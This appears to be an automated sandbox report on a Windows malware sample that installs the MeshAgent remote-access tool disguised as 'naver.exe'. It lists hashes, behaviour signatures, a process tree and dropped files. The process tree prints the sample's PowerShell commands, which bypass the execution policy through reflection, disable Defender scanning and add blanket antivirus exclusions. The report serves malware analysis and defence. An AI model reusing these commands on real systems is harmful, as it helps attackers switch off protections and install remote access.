Analysis

  • max time kernel
    124s
  • max time network
    138s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-09-2024 03:29

General

  • Target

    2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe

  • Size

    18.9MB

  • MD5

    4dfdae8af85639b2c395c7b10c6bf896

  • SHA1

    347bef6b6b30d1caf3af7e8709fefeec2a277071

  • SHA256

    b01fbd9f1842d5d983b203735b87bc646e3a332d6d975f6e4d05e11a346691bf

  • SHA512

    dcfd495f4012c051d5a5fdff7b77c8db65ef4036a6eb6d6ffe8e359f6625a4daea5dd4c851e3bc033b8eedcba09648592f02039d3ba11cd8a39f5f9a98272186

  • SSDEEP

    393216:g8g8THhdWnaqtvylAjWZ0Xq9YLuxMfCVb2z:Zg8mhtvylAjWZ0Xq9YLuxMfCVKz

Malware Config

Signatures

  • Detects MeshAgent payload 1 IoCs
  • MeshAgent

    MeshAgent is an open source remote access trojan written in C++.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Sets service image path in registry 2 TTPs 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 64 IoCs
  • Modifies data under HKEY_USERS 52 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:4304
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Function Disable-ExecutionPolicy {($ctx = $executionContext.GetType().GetField(\"_context\",\"NonPublic,Instance\").GetValue($executionContext)).GetType().GetField(\"_authorizationManager\",\"NonPublic,Instance\").SetValue($ctx, (New-Object System.Management.Automation.AuthorizationManager \"Microsoft.PowerShell\"))} Disable-ExecutionPolicy ; Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; "
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2064
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3660
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4044
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2532
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell "Add-MpPreference -ExclusionExtension '.exe' -Force"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of AdjustPrivilegeToken
            PID:3976
          • C:\Users\Admin\AppData\Local\naver\naver.exe
            C:\Users\Admin\AppData\Local\naver\naver.exe -install
            5⤵
            • Sets service image path in registry
            • Executes dropped EXE
            PID:5036
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3836,i,11391966286255097843,10588851088187498028,262144 --variations-seed-version --mojo-platform-channel-handle=4348 /prefetch:8
    1⤵
      PID:1392
    • C:\Users\Admin\AppData\Local\naver\naver.exe
      "C:\Users\Admin\AppData\Local\naver\naver.exe" --meshServiceName="naver Service"
      1⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious use of WriteProcessMemory
      PID:2192
      • C:\Windows\System32\wbem\wmic.exe
        wmic SystemEnclosure get ChassisTypes
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:692
      • C:\Windows\system32\wbem\wmic.exe
        wmic os get oslanguage /FORMAT:LIST
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:516
      • C:\Windows\System32\wbem\wmic.exe
        wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2216
      • C:\Windows\system32\wbem\wmic.exe
        wmic os get oslanguage /FORMAT:LIST
        2⤵
          PID:1652
        • C:\Windows\System32\wbem\wmic.exe
          wmic SystemEnclosure get ChassisTypes
          2⤵
            PID:4600
          • C:\Windows\System32\wbem\wmic.exe
            wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
            2⤵
              PID:1820
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -noprofile -nologo -command -
              2⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              PID:2868

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            2KB

            MD5

            2f57fde6b33e89a63cf0dfdd6e60a351

            SHA1

            445bf1b07223a04f8a159581a3d37d630273010f

            SHA256

            3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

            SHA512

            42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

            Filesize

            53KB

            MD5

            a26df49623eff12a70a93f649776dab7

            SHA1

            efb53bd0df3ac34bd119adf8788127ad57e53803

            SHA256

            4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

            SHA512

            e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            e89c193840c8fb53fc3de104b1c4b092

            SHA1

            8b41b6a392780e48cc33e673cf4412080c42981e

            SHA256

            920b0533da0c372d9d48d36e09d752c369aec8f67c334e98940909bfcb6c0e6c

            SHA512

            865667a22e741c738c62582f0f06ea4559bb63a1f0410065c6fb3da80667582697aba2e233e91068c02d9ab4fb5db282a681fe8234f4c77a5309b689a37ac3a2

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_21kxgm1v.tpz.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Local\naver\naver.exe

            Filesize

            5.3MB

            MD5

            c41e8324cb68c07c2bbff56d645cae53

            SHA1

            13518a95a782ea595aff1e7f15397d2968738718

            SHA256

            4f9f9cc3996b3f8ee33b46263ad726085ee4f06520012bcfb6a2df77ecdb7917

            SHA512

            7b2271be16d9729c32398b62299c5526dc6c9d98ef3213513554eb46f21917f50ab4b82b5e83ca83582c3b570e8a79713d2bf0779162d687aebbd3b47dd0900b

          • C:\Users\Admin\AppData\Local\naver\naver.msh

            Filesize

            22KB

            MD5

            2dd515ea546a81398d94dd15e3b4d55c

            SHA1

            eb0b0fca721a296906166b7e972559b87353b726

            SHA256

            becc832e6028a35aa50af95a2d80bcccbf0fcc8e9d1a333cd0661a77bdf089b2

            SHA512

            439b241e56783b766c70aaacfc2efe59b1136cc8e0e5377e606697d0b3048be6787a0a2ce2a549a294633dda8a39f02f2f457d999ce2ec22f74ef07daf912dfb

          • memory/2064-30-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp

            Filesize

            10.8MB

          • memory/2064-16-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp

            Filesize

            10.8MB

          • memory/2064-17-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp

            Filesize

            10.8MB

          • memory/2064-15-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp

            Filesize

            10.8MB

          • memory/3660-33-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp

            Filesize

            10.8MB

          • memory/3660-31-0x00007FFEC0003000-0x00007FFEC0005000-memory.dmp

            Filesize

            8KB

          • memory/3660-32-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp

            Filesize

            10.8MB

          • memory/3660-1-0x00007FFEC0003000-0x00007FFEC0005000-memory.dmp

            Filesize

            8KB

          • memory/3660-27-0x000001DAD2C90000-0x000001DAD2D06000-memory.dmp

            Filesize

            472KB

          • memory/3660-14-0x000001DAD2BC0000-0x000001DAD2C04000-memory.dmp

            Filesize

            272KB

          • memory/3660-13-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp

            Filesize

            10.8MB

          • memory/3660-52-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp

            Filesize

            10.8MB

          • memory/3660-12-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp

            Filesize

            10.8MB

          • memory/3660-7-0x000001DAD2350000-0x000001DAD2372000-memory.dmp

            Filesize

            136KB